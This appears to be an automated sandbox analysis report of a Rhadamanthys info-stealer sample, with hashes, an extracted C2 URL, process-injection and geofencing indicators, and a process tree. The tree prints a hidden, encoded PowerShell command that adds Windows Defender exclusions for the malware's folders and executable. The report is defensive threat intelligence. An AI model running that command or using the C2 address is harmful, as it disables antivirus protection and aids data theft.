Analysis
-
max time kernel
150s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
submitted
08-07-2024 09:19
Static task
static1
Behavioral task
behavioral1
Sample
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral2
Sample
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe
Resource
win11-20240704-en
General
-
Target
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe
-
Size
4.3MB
-
MD5
651962c322d049e7271543d8d2673311
-
SHA1
e4a3c9a15006aae882697cff0ec90795f658ee94
-
SHA256
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546
-
SHA512
121b96a1ce8e12924e41c2243cea25dbc13240c6cfadcfe01aecbea1c6676261cbcf89677fb1a8e429e22d47b1030b9e24e03b96a5f7e956316f02bd8d2c74b1
-
SSDEEP
98304:fh0DJ8JeTBYX6L9jeMr31y0pv/u4EmRIO3HLWjds/ht/tpxeSZ:bJeTKX6L9fHBW4bW+zdeS
Malware Config
Extracted
rhadamanthys
https://marckapq.ug/0f73f7f531224235bb0/5l7qnm6w.iic68
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4928 created 2504 4928 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 44 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3520 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Control Panel\International\Geo\Nation 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe -
Executes dropped EXE 3 IoCs
pid Process 1760 blue.exe 3328 blue.exe 6088 Version.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4228 set thread context of 4928 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 98 PID 1760 set thread context of 3328 1760 blue.exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language blue.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Version.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language blue.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4928 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 4928 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 3216 openwith.exe 3216 openwith.exe 3216 openwith.exe 3216 openwith.exe 3520 powershell.exe 3520 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe Token: SeDebugPrivilege 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe Token: SeDebugPrivilege 1760 blue.exe Token: SeDebugPrivilege 1760 blue.exe Token: SeDebugPrivilege 3328 blue.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 6088 Version.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 4228 wrote to memory of 1760 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 97 PID 4228 wrote to memory of 1760 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 97 PID 4228 wrote to memory of 1760 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 97 PID 4228 wrote to memory of 4928 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 98 PID 4228 wrote to memory of 4928 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 98 PID 4228 wrote to memory of 4928 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 98 PID 4228 wrote to memory of 4928 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 98 PID 4228 wrote to memory of 4928 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 98 PID 4228 wrote to memory of 4928 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 98 PID 4228 wrote to memory of 4928 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 98 PID 4228 wrote to memory of 4928 4228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 98 PID 4928 wrote to memory of 3216 4928 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 99 PID 4928 wrote to memory of 3216 4928 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 99 PID 4928 wrote to memory of 3216 4928 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 99 PID 4928 wrote to memory of 3216 4928 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 99 PID 4928 wrote to memory of 3216 4928 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 99 PID 1760 wrote to memory of 3328 1760 blue.exe 100 PID 1760 wrote to memory of 3328 1760 blue.exe 100 PID 1760 wrote to memory of 3328 1760 blue.exe 100 PID 1760 wrote to memory of 3328 1760 blue.exe 100 PID 1760 wrote to memory of 3328 1760 blue.exe 100 PID 1760 wrote to memory of 3328 1760 blue.exe 100 PID 1760 wrote to memory of 3328 1760 blue.exe 100 PID 1760 wrote to memory of 3328 1760 blue.exe 100
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2504
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3216
-
-
C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Users\Admin\AppData\Local\Temp\blue.exe"C:\Users\Admin\AppData\Local\Temp\blue.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\blue.exe"C:\Users\Admin\AppData\Local\Temp\blue.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
-
C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3856,i,17705702031385645742,8200011525621908985,262144 --variations-seed-version --mojo-platform-channel-handle=4652 /prefetch:81⤵PID:1380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVgBlAHIAcwBpAG8AbgAuAGUAeABlADsA1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
C:\Users\Admin\AppData\Local\AuditRuleType\ippauefi\Version.exeC:\Users\Admin\AppData\Local\AuditRuleType\ippauefi\Version.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6088
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe.log
Filesize958B
MD52653ec7e43bfbe52024d5bf4ec27a515
SHA1a08848300075d1c0b385532d840a43e1fd7251fa
SHA2565d7f555a970cc34988aac2e5deaccfc12ef69b5d9ea55fd8d31a9b4b8377f4f2
SHA512b3caeb925a71e99121b34cd1644f199e33a9b73b435cafb47bba0ffb7156d71b3b3ac424076cf0a600eeb422cb358420915a29b97c974937ebf9186bea05938d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD530cd8c00307286863dba2ec13fb2a611
SHA165815b908d5fd2905f70240d6dfe6e17f3c78aa1
SHA256c68192f008c1b7638e18ec1a6e5787953ea6775bb33acf9a12f64440f3b788e7
SHA51276a903bdb21ae382cd737432b2f5b3152589a3d3863c9120e9ad850d8cb46e07b90ed42f21d74840d4dc1383f2aee7bfc24f3f10eba94858e84af762bd404335